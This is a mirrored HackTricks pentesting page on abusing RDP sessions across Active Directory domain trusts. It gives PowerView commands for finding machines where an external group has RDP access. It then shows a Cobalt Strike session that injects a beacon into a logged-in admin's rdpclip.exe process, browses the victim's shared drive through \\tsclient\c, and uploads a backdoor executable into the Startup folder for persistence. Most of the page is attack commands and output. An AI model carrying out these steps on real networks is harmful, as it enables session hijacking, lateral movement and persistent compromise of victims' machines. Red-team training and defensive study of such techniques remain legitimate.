mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 03:53:29 +00:00
102 lines
5.2 KiB
Markdown
102 lines
5.2 KiB
Markdown
|
# RDP Sessions Abuse
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
## RDP Process Injection
|
||
|
|
||
|
If the **external group** has **RDP access** to any **computer** in the current domain, an **attacker** could **compromise that computer and wait for him**.
|
||
|
|
||
|
Once that user has accessed via RDP, the **attacker can pivot to that users session** and abuse its permissions in the external domain.
|
||
|
|
||
|
```powershell
|
||
|
# Supposing the group "External Users" has RDP access in the current domain
|
||
|
## lets find where they could access
|
||
|
## The easiest way would be with bloodhound, but you could also run:
|
||
|
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
|
||
|
#or
|
||
|
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
|
||
|
|
||
|
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
|
||
|
net logons
|
||
|
Logged on users at \\localhost:
|
||
|
EXT\super.admin
|
||
|
|
||
|
# With cobalt strike you could just inject a beacon inside of the RDP process
|
||
|
beacon> ps
|
||
|
PID PPID Name Arch Session User
|
||
|
--- ---- ---- ---- ------- -----
|
||
|
...
|
||
|
4960 1012 rdpclip.exe x64 3 EXT\super.admin
|
||
|
|
||
|
beacon> inject 4960 x64 tcp-local
|
||
|
## From that beacon you can just run powerview modules interacting with the external domain as that user
|
||
|
```
|
||
|
|
||
|
Check **other ways to steal sessions with other tools** [**in this page.**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
|
||
|
|
||
|
## RDPInception
|
||
|
|
||
|
If a user access via **RDP into a machine** where an **attacker** is **waiting** for him, the attacker will be able to **inject a beacon in the RDP session of the user** and if the **victim mounted his drive** when accessing via RDP, the **attacker could access it**.
|
||
|
|
||
|
In this case you could just **compromise** the **victims** **original computer** by writing a **backdoor** in the **statup folder**.
|
||
|
|
||
|
```powershell
|
||
|
# Wait til someone logs in:
|
||
|
net logons
|
||
|
Logged on users at \\localhost:
|
||
|
EXT\super.admin
|
||
|
|
||
|
# With cobalt strike you could just inject a beacon inside of the RDP process
|
||
|
beacon> ps
|
||
|
PID PPID Name Arch Session User
|
||
|
--- ---- ---- ---- ------- -----
|
||
|
...
|
||
|
4960 1012 rdpclip.exe x64 3 EXT\super.admin
|
||
|
|
||
|
beacon> inject 4960 x64 tcp-local
|
||
|
|
||
|
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
|
||
|
## \\tsclient\c is the C: drive on the origin machine of the RDP session
|
||
|
beacon> ls \\tsclient\c
|
||
|
|
||
|
Size Type Last Modified Name
|
||
|
---- ---- ------------- ----
|
||
|
dir 02/10/2021 04:11:30 $Recycle.Bin
|
||
|
dir 02/10/2021 03:23:44 Boot
|
||
|
dir 02/20/2021 10:15:23 Config.Msi
|
||
|
dir 10/18/2016 01:59:39 Documents and Settings
|
||
|
[...]
|
||
|
|
||
|
# Upload backdoor to startup folder
|
||
|
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
||
|
beacon> upload C:\Payloads\pivot.exe
|
||
|
```
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|